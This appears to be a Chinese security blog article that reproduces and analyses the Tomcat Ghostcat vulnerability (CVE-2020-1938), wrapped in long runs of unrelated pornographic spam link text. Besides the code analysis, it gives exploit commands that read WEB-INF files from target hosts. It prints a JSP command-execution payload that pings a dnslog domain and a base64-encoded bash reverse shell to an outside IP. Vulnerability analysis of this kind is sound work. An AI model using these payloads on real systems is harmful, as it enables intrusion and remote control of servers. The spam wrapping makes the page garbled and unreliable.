精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

JAVA安全之CVE-2020-1938復現和分析

安全 漏洞
對于處在漏洞影響版本范圍內的 Tomcat 而言,若其開啟 AJP Connector 且攻擊者能夠訪問 AJP Connector 服務端口的情況下,即存在被 Ghostcat 漏洞利用的風險。注意 Tomcat AJP Connector 默認配置下即為開啟狀態,且監聽在 0.0.0.0:8009 。

一、漏洞簡介

Apache Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器.默認情況下,Apache Tomcat會開啟AJP連接器,方便與其他Web服務器通過AJP協議進行交互.但Apache Tomcat在AJP協議的實現上存在漏洞,導致攻擊者可以通過發送惡意的AJP請求,可以讀取或者包含Web應用根目錄下的任意文件,如果配合文件上傳任意格式文件,將可能導致任意代碼執行(RCE).該漏洞利用AJP服務端口實現攻擊,未開啟AJP服務對外不受漏洞影響(tomcat默認將AJP服務開啟并綁定至0.0.0.0/0).

1、危險等級

高危

2、漏洞危害

攻擊者可以讀取 Tomcat所有 webapp目錄下的任意文件。此外如果網站應用提供文件上傳的功能,攻擊者可以先向服務端上傳一個內容含有惡意 JSP 腳本代碼的文件(上傳的文件本身可以是任意類型的文件,比如圖片、純文本文件等),然后利用 Ghostcat 漏洞進行文件包含,從而達到代碼執行的危害

3、影響范圍

Apache Tomcat 9.x < 9.0.31

Apache Tomcat 8.x < 8.5.51

Apache Tomcat 7.x < 7.0.100

Apache Tomcat 6.x

4、前提條件

對于處在漏洞影響版本范圍內的 Tomcat 而言,若其開啟 AJP Connector 且攻擊者能夠訪問 AJP Connector 服務端口的情況下,即存在被 Ghostcat 漏洞利用的風險。注意 Tomcat AJP Connector 默認配置下即為開啟狀態,且監聽在 0.0.0.0:8009 。

5、漏洞原理

Tomcat 配置了兩個Connecto,它們分別是 HTTP 和 AJP :HTTP默認端口為8080,處理http請求,而AJP默認端口8009,用于處理 AJP 協議的請求,而AJP比http更加優化,多用于反向、集群等,漏洞由于Tomcat AJP協議存在缺陷而導致,攻擊者利用該漏洞可通過構造特定參數,讀取服務器webapp下的任意文件以及可以包含任意文件,如果有某上傳點,上傳圖片馬等等,即可以獲取shel

二、漏洞分析

1.漏洞成因分析:

tomcat默認的conf/server.xml中配置了2個Connector,一個為8080的對外提供的HTTP協議端口,另外一個就是默認的8009 AJP協議端口,兩個端口默認均監聽在外網ip。

1675495543_63de08772101844913e5e.png!small?1675495544151

tomcat在接收ajp請求的時候調用org.apache.coyote.ajp.AjpProcessor來處理ajp消息,prepareRequest將ajp里面的內容取出來設置成request對象的Attribute屬性

如下圖:

在代碼的507行

1675495559_63de08879ca54c609ec68.png!small?1675495560408

可以通過此種特性從而可以控制request對象的下面三個Attribute屬性

javax.servlet.include.request_uri

javax.servlet.include.path_info

javax.servlet.include.servlet_path

然后封裝成對應的request之后,繼續走servlet的映射流程如下圖所示:

接著看第252行。

1675495573_63de089571223e3e999ff.png!small?1675495574253

2.利用方式:

(1)利用DefaultServlet實現任意文件下載

當url請求未在映射的url列表里面則會通過tomcat默認的DefaultServlet會根據上面的三個屬性來讀取文件,如下圖

1675495587_63de08a347a1f80fde8f9.png!small?1675495588119

通過serveResource方法來獲取資源文件

1675495602_63de08b2a1e8902ba22be.png!small?1675495603550

通過getRelativePath來獲取資源文件路徑

1675495610_63de08ba9c5c04a14b2fd.png!small?1675495611496

然后再通過控制ajp控制的上述三個屬性來讀取文件,通過操控上述三個屬性從而可以讀取到/WEB-INF下面的所有敏感文件,不限于class、xml、jar等文件。

(2)通過jspservlet實現任意后綴文件包含

當url(比如http://xxx/xxx/xxx.jsp)請求映射在org.apache.jasper.servlet.JspServlet這個servlet的時候也可通過上述三個屬性來控制訪問的jsp文件如下圖:

1675495622_63de08c6df6d67f1aad40.png!small?1675495623843

控制路徑之后就可以以jsp解析該文件 所以只需要一個可控文件內容的文件即可實現rce.

代碼段分析1:

tomcat默認監聽的8009端口用來處理AJP協議。AJP協議建立在TCP socket通信之上,tomcat使用該協議和前級的Web Server傳遞信息,這次的漏洞就出在客戶端可以利用ajp協議數據包控制request對象的一些字段。

具體地,tomcat源碼的org.apache.coyote.ajp.AjpProcessor類的service()方法如下:

1675495661_63de08ed1f79548730fd3.png!small?1675495661937

它調用的prepareRequest()方法用來解析一些請求頭,部分內容如下:

1675495672_63de08f8d247fc34a7a02.png!small?1675495673781

可以看到,當ajp數據包的頭設置為SC_REQ_ATTRIBUTE時(具體數值可以查詢AJP協議規范),Connector會緊接著讀取變量n(屬性名)和v(值),當n不是SC_A_REQ_LOCAL_ADDR、SC_A_REQ_REMOTE_PORT、SC_A_SSL_PROTOCOL時,就會用v來賦值屬性n。接著,service()方法將修改過的request代入后面的調用。

1675495683_63de09031ab64c0dbb5ef.png!small?1675495683885

=在org.apache.catalina.servlets.DefaultServlet中,當我們的請求聲明的是GET方法時,存在調用service()->doGet()->serveResource(),分析serveResource()代碼如下:

1675495698_63de09129249aeacc1aca.png!small?1675495699386

其調用的getRelativePath()方法內容如下:

protected String getRelativePath(HttpServletRequest request, boolean allowEmptyPath) {
String servletPath;
String pathInfo;

if (request.getAttribute(RequestDispatcher.INCLUDE_REQUEST_URI) != null) {
pathInfo = (String) request.getAttribute(RequestDispatcher.INCLUDE_PATH_INFO);
servletPath = (String) request.getAttribute(RequestDispatcher.INCLUDE_SERVLET_PATH);
} else{
......
}
StringBuilder result = new StringBuilder();
if (servletPath.length() > 0) {
result.append(servletPath);
}
if (pathInfo != null) {
result.append(pathInfo);
}
......
return result.toString();
}

從javax.servlet.RequestDispatcher中可以看到這三個屬性的名稱:

1675495711_63de091f1efb2e76204d9.png!small?1675495711880

所以,我們就能通過AJP協議改變request的這三個屬性來控制請求的路徑,serveResource()方法獲得path后的代碼大致如下:

1675495718_63de0926162c5f84f2e04.png!small?1675495718865

它會直接把通過path獲取的資源序列化輸出,因此客戶端再按照AJP協議解析數據包就能得到文件內容。

代碼段分析2:

同樣的道理,tomcat默認將jsp/jspx結尾的請求交給org.apache.jasper.servlet.JspServlet處理,它的service()方法如下:

1675495729_63de0931a4dcbf9fe88e6.png!small?1675495730481

可以看到jspUri也是由兩個可控的屬性定義的,后續代碼:

1675495738_63de093a107a3b1086c65.png!small?1675495738872

代碼在這里根據jspUri生成了一個JspServletWrapper,它會調用service()方法完成jsp代碼的編譯,將其轉換成一個servlet。該servlet最終會以.java文件的形式寫入%CATALINA_HOME%/work/Engine/Host/Context目錄下:

1675495748_63de0944acf1e776d553f.png!small?1675495749525

經過上述調用,這就形成了文件包含漏洞。當Web應用上有某個文件內容可被我們控制時,就可以造成rce漏洞。

三、漏洞復現

1.環境的準備

(1)windows下漏洞復現環境準備,這里以tomcat-8.5.32為例。

https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip

(2)安裝jdk并配置JDK環境

(3)然后啟動tomcat,點擊tomcat目錄/bin 文件夾下的startup.bat

1675495756_63de094c6b7d3c0d8f7ff.png!small?1675495757384

root@kali2019:~# git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi root@kali2019:~# cd CNVD-2020-10487-Tomcat-Ajp-lfi/ root@kali2019:~/CNVD-2020-10487-Tomcat-Ajp-lfi# chmod +x CNVD-2020-10487-Tomcat-Ajp-lfi.py root@kali2019:~/CNVD-2020-10487-Tomcat-Ajp-lfi#

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xm

讀取文件

讀取web-inf/web.xm文件

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.10.134 -p 8009 -f WEB-INF/web.xml

1675495766_63de09564a4e59bbdf05e.png!small?1675495767222

python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.10.10.134 -p 8009 -f index.jsp

1675495788_63de096cc1e32543a10f5.png!small?1675495789626

命令執行

執行whoami命令

python "文件包含(CVE-2020-1938).py" 10.10.10.134 -p 8009 -f /test.txt

1675495796_63de09748fda46c49e82e.png!small?1675495797357

ping dnslog

<%
java.io.InputStream in = Runtime.getRuntime().exec("ping fiohed.dnslog.cn").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>

1675495805_63de097d3a6a076325719.png!small?1675495806076

1675495810_63de098233ee70af149cc.png!small?1675495811126

反彈shell

  • 反彈shell用的命令需要進行bash編碼
  • 在線bash編碼:http://www.jackson-t.ca/runtime-exec-payloads.html
  • https://ares-x.com/tools/runtime-exec/
  • POC下載地址:https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC41LzE4ODg4IDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>

1675495817_63de0989e385160cf4f3b.png!small?1675495818705

在反彈shell的過程中,我嘗試多次之后失敗了。就放了一張米斯特斯文師傅的一張成功的圖片。

1675495842_63de09a2ce9004ba442c1.png!small?1675495843853

REF

https://www.cnblogs.com/backlion/p/12870365.html

https://xz.aliyun.com/t/7325

https://www.svenbeast.com/post/fqSI9laE8/

責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2020-12-25 10:08:30

漏洞Windows操作系統

2020-10-25 09:39:49

漏洞分析

2020-10-23 11:13:39

漏洞網絡安全網絡攻擊

2023-02-16 08:17:25

2021-02-09 10:31:04

漏洞webWordPress F

2020-10-19 10:43:49

漏洞

2022-06-14 09:00:21

漏洞補丁

2020-03-04 14:01:31

戴爾

2011-03-17 11:24:18

2014-11-10 16:06:26

加密APP安全打車軟件

2018-08-03 16:09:09

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2020-10-12 10:28:15

漏洞內存破壞網絡攻擊

2021-02-07 14:39:22

Falco漏洞安全工具

2020-07-15 10:35:25

漏洞攻擊網絡安全

2017-08-15 17:34:26

安全運營安全分析網絡安全

2009-08-24 10:34:06

安全網關趨勢分析

2020-12-28 10:23:00

中間人攻擊漏洞Kubernetes

2020-12-11 11:18:43

MiTMKubernetes漏洞

2020-06-01 11:49:27

小米MIUI
點贊
收藏

51CTO技術棧公眾號

免费一级特黄3大片视频| 成人小视频在线看| 99国产揄拍国产精品| 欧美先锋影音| 亚洲视频在线视频| 最新av免费在线观看| 678在线观看视频| 欧美国产欧美亚州国产日韩mv天天看完整| 亚洲精品日产aⅴ| 欧美一区二区三区四| 日韩黄色大片网站| 精品盗摄一区二区三区| 韩国视频一区二区三区| 日本在线观看大片免费视频| 久久综合狠狠综合久久激情| 成人激情春色网| 天天操天天干视频| 91精品一区二区三区综合在线爱 | 中文字幕自拍偷拍| 激情另类综合| 久久这里只有精品99| 91精品国产自产| 亚洲精品观看| 欧美精品日韩一本| 亚洲色图38p| free性m.freesex欧美| 成人欧美一区二区三区1314| 农村寡妇一区二区三区| 亚洲第一大网站| 蜜桃精品视频在线| 欧美在线欧美在线| 国产网址在线观看| 综合天堂久久久久久久| 视频一区视频二区国产精品| 最新中文字幕视频| 综合视频一区| 欧美一级在线免费| 日韩成人av免费| 成人av色网站| 欧亚洲嫩模精品一区三区| 黄页网站大全在线观看| 1区2区3区在线视频| 国产精品五月天| 日本不卡一区二区三区在线观看 | 桥本有菜av在线| 国产理论电影在线观看| 久久综合久久综合久久综合| 国产女人水真多18毛片18精品 | 精品一区二区三区久久久| 国产精品久久不能| 手机av免费观看| 美女精品在线| 国产99久久精品一区二区 夜夜躁日日躁| 国产亚洲精品码| 欧美午夜电影在线观看| 久久69精品久久久久久国产越南| 精品亚洲乱码一区二区 | 国产亚洲成精品久久| 久久久久久亚洲中文字幕无码| 久9re热视频这里只有精品| 精品国产人成亚洲区| 免费看黄色片的网站| av成人资源| 亚洲第一级黄色片| 极品粉嫩小仙女高潮喷水久久| 青青一区二区| 亚洲国产欧美久久| 真人bbbbbbbbb毛片| 美腿丝袜亚洲图片| 国产视频综合在线| 摸摸摸bbb毛毛毛片| 久久久久久久久久久久久久久| 国产日产精品久久久久久婷婷| 久久久久久日产精品| 日韩精品一区二区三区四区五区| 精品无人乱码| 国产精品久久久久天堂| 成年人黄色在线观看| 污视频在线看网站| 精品久久久久久久久中文字幕| 欧美 国产 日本| 电影亚洲精品噜噜在线观看| 欧美日韩精品综合在线| 日韩a一级欧美一级| 国产美女撒尿一区二区| 亚洲免费电影在线观看| ass极品国模人体欣赏| 综合久久99| 欧美资源在线观看| 这里只有精品免费视频| 国产一区二区不卡| 久久成人资源| 日本在线免费看| 亚洲伊人色欲综合网| 久久国产乱子伦免费精品| 欧美aaaaaa| 欧美一区二区久久| 国产精品无码在线| 日韩免费视频| 国外视频精品毛片| 中文字幕+乱码+中文乱码www| 国产精品一级黄| 免费在线一区二区| 在线看三级电影| 色婷婷av久久久久久久| 香蕉视频色在线观看| 香蕉久久夜色精品国产更新时间| 日韩综合视频在线观看| 亚洲欧美在线视频免费| 久久国产三级精品| 噜噜噜噜噜久久久久久91| 麻豆传媒视频在线| 欧美日韩亚洲精品内裤| 99九九99九九九99九他书对| 欧美91在线| 另类少妇人与禽zozz0性伦| 岛国av中文字幕| 国产成人亚洲精品青草天美| 色综合久久av| 女海盗2成人h版中文字幕| 欧美日韩国产成人在线免费| 中文成人无字幕乱码精品区| 亚洲综合中文| 国产精品热视频| 婷婷国产在线| 一区二区三区.www| 可以看污的网站| 蜜桃国内精品久久久久软件9| 欧美黑人性猛交| 国产又爽又黄免费软件| 国产日本欧美一区二区| 欧美三级一级片| 国产成人tv| 久久99国产精品久久久久久久久| 在线观看视频中文字幕| 国产日产欧美一区二区三区| 国产亚洲精品网站| 高清日韩欧美| 国内精久久久久久久久久人| 国产av无码专区亚洲a∨毛片| 国产精品国产三级国产aⅴ无密码 国产精品国产三级国产aⅴ原创 | 日本欧美视频在线观看| 日韩欧乱色一区二区三区在线 | 精精国产xxxx视频在线| 欧美日韩日日骚| 久久视频一区二区三区| 日本亚洲欧美天堂免费| 视频一区亚洲| 成人黄色毛片| 在线日韩中文字幕| 综合久久中文字幕| 国产精品美女久久久久久2018 | 亚洲成人人体| 亚洲网站在线看| 奴色虐av一区二区三区| 国产三级精品视频| 欧美婷婷精品激情| 日韩电影免费网站| 国产日产欧美a一级在线| av大片在线看| 777欧美精品| 久久久一区二区三区四区| 高清不卡一二三区| www.射射射| 综合色就爱涩涩涩综合婷婷| 国产91在线播放九色快色| 九色视频在线观看免费播放| 欧亚洲嫩模精品一区三区| 日本高清黄色片| 精品一区二区日韩| 日本阿v视频在线观看| 老司机精品视频在线播放| 国产成人97精品免费看片| 成年网站在线| 日韩欧美123| 久久艹免费视频| 国产日产欧美一区二区三区| 久国产精品视频| 国语精品一区| 欧美日产一区二区三区在线观看| 久久久成人av毛片免费观看| 日韩中文理论片| 91成年人视频| 午夜私人影院久久久久| 国产精品一二三区在线观看| 久久国产精品无码网站| www.18av.com| 国产麻豆一区二区三区精品视频| 国产一区二区在线免费视频| 黄色小说在线播放| 伊人久久免费视频| а√中文在线资源库| 欧美日韩国产精品一区二区三区四区| 成人性生交大片免费看无遮挡aⅴ| 国产在线观看一区二区| 欧美日韩黄色一级片| 色999国产精品| 国产视频一区二区不卡| 欧美美女福利视频| 国内外成人免费激情在线视频网站| av在线天堂播放| 精品粉嫩aⅴ一区二区三区四区| 中文天堂在线资源| 亚洲成人午夜电影| 国内毛片毛片毛片毛片毛片| 91视频观看视频| 久久久久无码精品| 热久久免费视频| 青青草视频在线免费播放| 欧美激情777| 欧美最大成人综合网| 澳门成人av| 成人性生交大片免费看小说 | 国产综合视频一区二区三区免费| 欧美一级xxx| 中文字幕人妻色偷偷久久| 午夜成人免费视频| 18岁成人毛片| 国产精品乱人伦| 日本一级免费视频| 91视频在线看| 日韩精品视频一区二区| 狠狠狠色丁香婷婷综合久久五月| 黑人糟蹋人妻hd中文字幕| 国内精品福利| 麻豆映画在线观看| 久久精品99久久无色码中文字幕| 玛丽玛丽电影原版免费观看1977 | 欧美成人在线免费观看| 日韩一区二区三区精品| 成人精品视频在线| 玖玖精品在线| 国产精品久久久久999| 电影一区二区三区| 欧美孕妇与黑人孕交| 麻豆mv在线看| 97在线视频免费看| 成全电影大全在线观看| 欧美精品少妇videofree| 免费a级毛片在线播放| 丝袜美腿亚洲一区二区| www.视频在线.com| 亚洲香蕉在线观看| 国产最新视频在线| 亚洲一级黄色av| 都市激情一区| 最近2019年手机中文字幕| 国产youjizz在线| 亚洲午夜久久久影院| 国产免费av高清在线| 亚洲香蕉成视频在线观看 | 99精品国产高清一区二区麻豆| 成人性教育视频在线观看| 精品国产三级| 国产麻豆日韩| 五月国产精品| 日韩中文一区二区三区| 日本在线电影一区二区三区| 一本色道久久综合亚洲二区三区| 国产电影一区二区在线观看| 亚洲国产精品影视| 欧美日韩免费| 毛片在线播放视频| 日韩精品电影在线| 五月婷婷丁香色| 国产美女精品在线| 亚洲少妇中文字幕| 91原创在线视频| 日韩福利在线视频| 一区二区三区在线视频免费| 国产一级大片在线观看| 欧美日韩亚洲一区二区三区| 波多野结衣视频网址| 91精品国产免费| 乱色精品无码一区二区国产盗| 亚洲精品综合久久中文字幕| aⅴ在线视频男人的天堂 | 一级黄色录像视频| 亚洲v中文字幕| 日韩av免费播放| 日韩午夜在线观看| 头脑特工队2在线播放| 色偷偷亚洲男人天堂| 欧美性受ⅹ╳╳╳黑人a性爽| 51视频国产精品一区二区| 日本黄色一区| 国产成人精品自拍| 国产欧美日韩在线观看视频| 一道本在线观看视频| 亚洲一区图片| 尤物网站在线看| 久久久亚洲精品石原莉奈| 丰满少妇被猛烈进入一区二区| 精品国产鲁一鲁一区二区张丽 | 国内精品在线播放| 熟妇高潮精品一区二区三区| 综合激情成人伊人| 久久久久久久久久影院| 7777精品久久久大香线蕉| 无码国产精品一区二区免费16| 中文字幕日韩av电影| japanese色国产在线看视频| 国产欧美日韩专区发布| 欧美美女啪啪| 大地资源网在线观看免费官网| 先锋影音久久| 又大又长粗又爽又黄少妇视频| 久久久一区二区三区捆绑**| 激情综合网五月婷婷| 欧美日韩不卡一区二区| 日本中文字幕一区二区有码在线| 欧美xxxx18性欧美| 福利一区二区| 欧美日韩精品中文字幕一区二区| 激情一区二区| 亚洲一级片免费观看| 国产精品久久午夜| 亚洲 欧美 日韩 综合| 欧美成人激情免费网| 夜级特黄日本大片_在线 | 国产成人无码专区| 亚洲精品一区二区三区在线观看| 免费成人黄色| 国产精品视频资源| 免费成人网www| 成人黄色av片| av激情亚洲男人天堂| 九九热精彩视频| 日韩午夜小视频| 怡红院在线播放| 成人天堂噜噜噜| 欧美韩日一区| 中文字幕成人在线视频| 欧美极品aⅴ影院| 中文字幕在线观看视频免费| 亚洲欧美日本精品| 日韩在线伦理| 免费在线观看一区二区| 久久高清国产| 日本爱爱爱视频| 欧美三区在线视频| 91美女视频在线| 国产精品自产拍高潮在线观看| 精品日韩一区| 色婷婷.com| 中文字幕日韩av资源站| 亚洲天堂一二三| 久久久国产一区二区| www.成人在线.com| 可以免费看的黄色网址| 国产毛片一区二区| 国内偷拍精品视频| 精品国精品国产尤物美女| 国产探花视频在线观看| 国产一区免费| 亚洲综合欧美| 一本在线免费视频| 欧美精品一级二级三级| 97超碰资源站在线观看| 不卡视频一区二区| 亚洲精选国产| 91成人破解版| 91精品在线麻豆| 成人福利影视| 欧美日韩国产综合在线| 日日夜夜免费精品视频| 国产wwwwxxxx| 精品精品国产高清a毛片牛牛| 98色花堂精品视频在线观看| 欧美xxxx黑人又粗又长密月| 日本系列欧美系列| 日韩欧美123区| 亚洲精品在线三区| 国产精品伦理| 欧美一级免费在线观看| 成人黄色网址在线观看| 成人免费毛片视频| 久久精品在线视频| 久久porn| 久久这里只精品| 亚洲一区二区在线播放相泽| 青青草免费在线| 成人黄色av播放免费| 亚洲另类视频| 欧美性生交大片| 亚洲国产精品热久久| 日本在线视频一区二区| 蜜臀在线免费观看| 久久这里都是精品| 国产精品久久久午夜夜伦鲁鲁 | 成人免费av电影| 日韩人妻一区二区三区蜜桃视频| av一区二区不卡| 亚洲一级片免费看| 97久久精品在线| 欧美~级网站不卡| 极品人妻videosss人妻| 欧美va亚洲va| 黑人一区二区三区| 日本三级免费网站|